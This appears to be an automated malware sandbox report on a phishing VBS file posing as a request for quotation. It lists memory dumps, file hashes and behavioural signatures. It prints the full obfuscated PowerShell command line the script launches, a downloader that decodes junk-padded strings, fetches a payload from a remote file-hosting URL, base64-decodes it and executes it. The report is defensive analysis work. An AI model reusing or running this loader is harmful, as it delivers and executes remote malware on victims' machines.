memory/2412-10-0x000001E9327D0000-0x000001E9327F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r5c13izr.0o4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2412-11-0x00007FFC0C5E0000-0x00007FFC0D0A1000-memory.dmp
memory/2412-12-0x00007FFC0C5E0000-0x00007FFC0D0A1000-memory.dmp
memory/2412-14-0x00007FFC0C5E3000-0x00007FFC0C5E5000-memory.dmp
memory/2412-15-0x00007FFC0C5E0000-0x00007FFC0D0A1000-memory.dmp
memory/2412-17-0x00007FFC0C5E0000-0x00007FFC0D0A1000-memory.dmp
memory/2412-18-0x00007FFC0C5E0000-0x00007FFC0D0A1000-memory.dmp
memory/2412-21-0x00007FFC0C5E0000-0x00007FFC0D0A1000-memory.dmp
memory/1840-22-0x0000000004D80000-0x0000000004DB6000-memory.dmp
memory/1840-23-0x00000000054A0000-0x0000000005AC8000-memory.dmp
memory/1840-24-0x0000000005470000-0x0000000005492000-memory.dmp
memory/1840-25-0x0000000005B50000-0x0000000005BB6000-memory.dmp
memory/1840-26-0x0000000005BC0000-0x0000000005C26000-memory.dmp
memory/1840-33-0x0000000005D00000-0x0000000006054000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d336b18e0e02e045650ac4f24c7ecaa7 |
| SHA1 | 87ce962bb3aa89fc06d5eb54f1a225ae76225b1c |
| SHA256 | 87e250ac493525f87051f19207d735b28aa827d025f2865ffc40ba775db9fc27 |
| SHA512 | e538e4ecf771db02745061f804a0db31f59359f32195b4f8c276054779509eaea63665adf6fedbb1953fa14eb471181eb085880341c7368330d8c3a26605bb18 |
memory/1840-38-0x0000000006350000-0x000000000636E000-memory.dmp
memory/1840-39-0x00000000063E0000-0x000000000642C000-memory.dmp
memory/1840-40-0x00000000079F0000-0x000000000806A000-memory.dmp
memory/1840-41-0x00000000068D0000-0x00000000068EA000-memory.dmp
memory/1840-42-0x0000000007610000-0x00000000076A6000-memory.dmp
memory/1840-43-0x0000000007570000-0x0000000007592000-memory.dmp
memory/1840-44-0x0000000008620000-0x0000000008BC4000-memory.dmp
C:\Users\Admin\AppData\Roaming\Bortelimeneres.Uds
| MD5 | b3d91ec6a3eb97821759453637c6c7ad |
| SHA1 | 471d11af010f2d40bd90d9744fe9d15d964645e4 |
| SHA256 | afb489226c47e56fdcebdba5d21447c4f5422ce541ce21c389d62fa8b9d5865e |
| SHA512 | 227586fd756d00597c50b7fb9891c35f68bcc15397cc161164fb37ee5a6d4c78e6361d3f053d4442e812e05f9e6913071b795a0ea063f7e1779b80852b80e333 |
memory/1840-46-0x0000000008BD0000-0x0000000009EC2000-memory.dmp
memory/1168-60-0x0000000000CB0000-0x0000000001F04000-memory.dmp
memory/1168-62-0x0000000000CB0000-0x0000000000CF8000-memory.dmp
memory/1168-61-0x0000000000CB0000-0x0000000001F04000-memory.dmp
memory/1168-63-0x0000000020A90000-0x0000000020B2C000-memory.dmp
memory/1168-65-0x00000000215F0000-0x00000000217B2000-memory.dmp
memory/1168-66-0x0000000020EC0000-0x0000000020F10000-memory.dmp
memory/1168-68-0x00000000217C0000-0x0000000021852000-memory.dmp
memory/1168-69-0x0000000020FA0000-0x0000000020FAA000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-30 06:23
Reported
2024-10-30 06:25
Platform
win7-20240903-en
Max time kernel
150s
Max time network
122s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2040 wrote to memory of 2588 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2040 wrote to memory of 2588 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2040 wrote to memory of 2588 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request For Quotation-RFQ097524_Pdf.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Skravereapparat Brnecykels Chilotomy Allegorien #>;$rlingsankerets='Blissful';<#Revanchekamps Ledestjerne Dandyishly Momotidae Anraaber Rommens #>; function Indbankende($Udspejdes){If ($host.DebuggerEnabled) {$Nationalrettens++;}$Refusionsopgrelsen=$Notwithstanding+$Udspejdes.'Length'-$Nationalrettens; for ( $Skillessness=5;$Skillessness -lt $Refusionsopgrelsen;$Skillessness+=6){$vejle=$Skillessness;$spejlet+=$Udspejdes[$Skillessness];}$spejlet;}function Pyrogens($Woblernes){ . ($Brinkmanns) ($Woblernes);}$Konformistiske=Indbankende 'LicenM DevioCeleszPersoiAffejlAa sklB dgraCusto/ko,st ';$Unsimulated156=Indbankende 'PrdisTcr,nalOrgans vile1 Shin2Forha ';$Mirjas='prove[AtramNStjerET,eogTK pit. dstas ,emaePar orFavorvPaniciSibilCKo,ceeSsl.np ExtooSpgelISpiriNReforTSlaaemLedsaaUttheNJow eAKeerigTusseEMaaleRAp ca] cari:Ch li:SeacoSSubpaERhinoCSnkniUCitywRInforiRepo tWolfrYEpexep L,derSkrivoUn alTAnseeO,jeneCFlygtOSoloslHyper=Drama$ tomiuRegisn CacoSProtii ugtiMRecliUEmblel MoldaMaaletFravreRom.ndHange1Faggo5Sanch6Jej,n ';$Konformistiske+=Indbankende 'Solst5Inter.St ki0Triss arbl(S micWInd eiBrndenNonsudAfs ioSidemwImpsosInsna cho dNSta iTCogit retsl1Disbo0 Kon .medde0 Sama;Safir BasylWstiksiUdv sn Pl u6Nedsl4 ,rig;Outsi .roldxThirs6Utthe4Diopt; Insi canalrChu,mvEffer:Crino1 Suba3Mangl1Affyr. Laps0Viv.c)Jenbr PartsGUni reHagbacUnt ekDis eoSaltp/Idiot2Gobyp0Puppe1Kandi0Haang0Under1U rmn0Hverd1Melli Af nF rusvi nterbattleKb anfsaarso Und xOkseb/Svine1Afkld3Rep o1anthe.Kidne0 B ug ';$Platoniker=Indbankende ',apesuFor,osUniveESordiR Fa,t-partiaMasseGApterEFrivoNBourntCopro ';$Udbldningers=Indbankende ' Dm nhUrnegtTypogts rmopArrens Call:Dyrlg/ nage/Preced.ilkar .rtiiUndervOutcaeFarve.NeodagefteroPlumoo SkrdgIndkol New eNrlse.StentcBevidoWoodym uses/opdrauImmatcFable?Pyro.eMisvix An epTissuosuperrDysletMgald=VentrdPuirso Kirkw Impen SeselDeprioDipnear fledKamm & Ma aiAnteddacc u=Softw1Mater2HumboVP,rineKryds-prod.AFarengUlkenfSkalpT VulcuMa giCukr iK Unm n.eceniA lesh rude7Statsa phonWR.spolSamme3Tilt,9ge tez SommpJubelQValseuUdskaj SkamkLabyrCGardiw RecogBremsdBijobHTeosoT,rste ';$Rattus=Indbankende 'c,rks>.ajor ';$Brinkmanns=Indbankende ' aldiDoumaemalacX Cr o ';$Fient='Outrivalled';$Skandinavist='\Bortelimeneres.Uds';Pyrogens (Indbankende 'Rudim$DozerGRainwL MangO OverbP lgrA S lel Regn:RadiuAtrikom nterBFiraaITk,edTDaktyiTilbasClothE ChamRmorale latasUndet=Explo$R ughEBel jnBallovInact:Bil,oAing nPGrat P SqueDSuperATorskt,latiaStrab+Ftncm$ .oussBl,bmKNeapoASvensNTakr DTo.sii inimn Sa nAS illVUdkigi essls Dre.tFra.r ');Pyrogens (Indbankende 'Zooph$ SterGTo,meL GuimO Schib eurya I trLletha:dialesMal,rUL fttpNondee Un,artaktfLCent,ADul.iBHal lOFdse RIsen,iElectoPhysouKalliSPsyc.nUnderEMult sInte,sMesch=Givti$TithouSyndidNedblB TabiLInvalDFrednnMarkeIU ocaN.nputG Per,ERos,bRVes,csUdenr.remisSFunduPFo,reL umbi amueTKr dr( onog$FormoR DelmAF rhaT Lnovt,agaeuRouses mort)Pinne ');Pyrogens (Indbankende $Mirjas);$Udbldningers=$superlaboriousness[0];$Verifikationens=(Indbankende 'Subca$G utcgLikvilre,reOHerm BPlodda s dalBrob : ReveIInstamRaketmVoldgAUnrufricterCFengeEAfmilS.lissc.lectIRdhaab BevglResigEu pan5Ap lo=JoannNQui.zeUdtalW Assi-HalvnOLeksibPandejSa,dsE ampCL.erbT Semi antshSPhysiyChikiSCykelt,aataEBlithMFrids.PosttnKr gsE nkartJehul.TegniwlifeseRegulbCrumbC ontrLAfhugiIndrme Tredn F astekspe ');Pyrogens ($Verifikationens);Pyrogens (Indbankende 'Koord$UnderIKujonmKildemAp alaVarebrSlskicSrv,reSatirsForsoc RegiihjemlbabelilSuluderelak5Rkeen.GabbiH yrogeMa ara hjr dGenereBa,serVirgosSubco[Pulas$ g.leP SkiblIllusa VisutKio,koStukknReshoiIsagokAnmrkeF,rgarCirke]Lsgr =Perso$ Bi.tKHuedeo Pan n Accif UlydobasigrOv rbmSytteiSkyldsA otetBegrliHe edsVnnedkNonh.eSorns ');$Strops203=Indbankende 'Hje,l$ StraIThundmHospimUdarma DegnrBescucKiwifeBosats ProrcMisi iGennebUstillForepe Anse5Milke.ChummDProg.oMetapw PolenMorn lSubs.oCraziaR tradbirkeFSub riLeadllC nnieTuris(S let$ ssegURavkndO erpbMajorlHedondMam nnAsieniOve nnV nregTopi e Brolr JulesDups , Inte$ saetP Forlo AngisEx,rot Odyst DommhN taly iplorTillgo B,vaiMelled IndraNo dvl Nd r)Misun ';$Postthyroidal=$Ambitiseres;Pyrogens (Indbankende 'Salie$ Sejugbarrel Ded.oGastrbGroanaParallSu or: SuboN UranoHresin CycyrL arne WeekQMi jsu vvei UnliS L rsIContetnitraeMi er=Seleu(SolostFjerneBlokastoksiT tire- Un hpHysteASkabsTInputh .hau eve$Dorsop Tilso epi SDis,eT nosttC argHStyrey InteRForbroRetsfiArabiDFabelaUn,raLsubtr)Hebra ');while (!$Nonrequisite) {Pyrogens (Indbankende 'Clina$ Kiasg tte lNavigoIn,flbUnlenamoililSpoli:CentiO angivDrifteSa iarBet.ehBirodoTanetl LnkoiIrishnKonfueE carstas es Aebl=Hybel$ UntrtLavherGreveu Dawne.orts ') ;Pyrogens $Strops203;Pyrogens (Indbankende 'Arti,SForflTDisaraproc,r artTFilov-SrskrSIl egl T amEStaldep iorPCl.rk Kajsp4Imeri ');Pyrogens (Indbankende ' Spri$OutwogWildiL Gok O undeBForskaWith.LDomme:Rr ddnF jlpoSuperndo ber PolyeC.mmeqSkambUViseliH.lvoSGermaIrift TStadfeCingu=Slger(Hyt eTTelegEPeppes Ton Tforly-IndbjPBlidea .fsktGinenh Unex Aris$FirempSugamOC,nomsProgrTBir.et Unu hSol,iY TerrRBas loRutsjI Apo,DFissuaA aziL,lama)Ne li ') ;Pyrogens (Indbankende 'Couri$AarenG Ons Lfolkeo.essubAf.edaDelegLci,il:LiterlTr.ppE JagtT fkbeT valie beklsGrucctOblivEUk,ukS Slag=Unint$Psyc,GRaadgL.ktexOKishkb B ggaWaferL Bush:Kde,eiBankbDSkamfEBarneNOutcatAdelsIDuvniTMarkeeAf krT S syS KaffPR gklrEggheONonbeb UndelPeploeacce,mNebraEUnd rTPrestspret +Bispo+Po zo%Filmm$ArtikSFacituStn ePRisenEBerthr SeleLLap laGittiBSu,ero SyssrOoi.si .ateo MellU N nvS.rednNPrefaE Impasari,rS Rund.AffircunlinOBu kiuRentenVugn TRamli ') ;$Udbldningers=$superlaboriousness[$Lettestes];}$Omdigtning=318395;$Uforsrgedes=31683;Pyrogens (Indbankende 'Baby $ Afk GIndkol R enOPrecoBSelvfA,hichlB,ond:VifilB.aninaClipsrFrsteYAposeS SnegP.verhhMaculeFidfaRRednie Ree mosg.=Dwa f EtatsGtelegEPockiTpough- DelmCTo.dioDefaiNvaabeTBl thES rygnSubarTLseng Tra,$DegenpVkkerOSkilbsTrillTPiecetVexatH kroby mertrFan,eO utatiHermeDC.sigaUdplulB.mhu ');Pyrogens (Indbankende ' Simp$Bahr gAttrilTrestoretrab c pyaSkattlS,inn:SprogD Bldhr UmbeaSube.nBorsyksrhfte EnerrTagryeRegio1Gul.y5Ford.3Slank Pa.as=Rejse Gril[TawdrSStandyUntersCompet Bre.eGl rem Biog.TabulCbilggoInforn udskvDreameDatabrAagettSider]P uci:Story:AutopFBouchrsalgboLudwim CincB Pr.caSlvbesFodere Flag6Overs4SneglSWooletKompirAfflaiNasarnRund.gVitup( Ldin$SlantBZarzuaFniker PaakyDrawbsEmblepr sunhOver eSeraerAmphieSpeku) arro ');Pyrogens (Indbankende ' fkli$.ammeGL getlWayako amibAfstdAKon rlPalai:.esepRly edOBereguP askg elfrhRosenI Fo tSU.smohSurde Smila= Paro nat.r[DrnedSKadenYTodd.Sexem TGoodleRecitM Met .alvorTRul eE arkeXAngartIndor. oldeELdrepnGraphCRepolO UdbeDKnoglISubclNDvrgfGfable]under: inni:Spid A ReseSDesilCG apaiIrratiNo de.,nkleg DentERentetS cias orstTtysaRMetasi Lgnen Platgdisem(Blods$Debi.DBlomsr NoncAUnbomNarbejKPasteesove RafmysEwullc1Physi5B.rne3Hornb)aceit ');Pyrogens (Indbankende 'Plati$detaigR zorlTil.oO,ugbrbNatalaMerliL.ensy:VaultFFarceLNunshE BreaTEj ndf Blo.E PrisL olshtNarageRhe mr Prob=.nter$ Fa irKvadroOuz,suLicenGS lliHDi saIFe dsSbeva hBel.j.ServiSMistnuMelleBAndens zaret V,olRSkallI Th nNHekseG Pi u(Inter$MadweOForstM StaddMedioIDinosGProceTImpernKjersIChuntnA lerg Hyal,Flde.$UmtteU B,kefOvertOVernar CensSSemitrWeepiGVerrieRm.blD S,ameFebe,SAbsol)Delfl ');Pyrogens $Fletfelter;"
Network
Files
memory/2588-4-0x000007FEF5BDE000-0x000007FEF5BDF000-memory.dmp
memory/2588-5-0x000000001B670000-0x000000001B952000-memory.dmp
memory/2588-6-0x0000000001C10000-0x0000000001C18000-memory.dmp
memory/2588-7-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp
memory/2588-8-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp
memory/2588-9-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp
memory/2588-10-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp
memory/2588-11-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp
memory/2588-12-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp
memory/2588-13-0x000007FEF5BDE000-0x000007FEF5BDF000-memory.dmp
memory/2588-14-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp
memory/2588-15-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp
memory/2588-16-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp
memory/2588-17-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp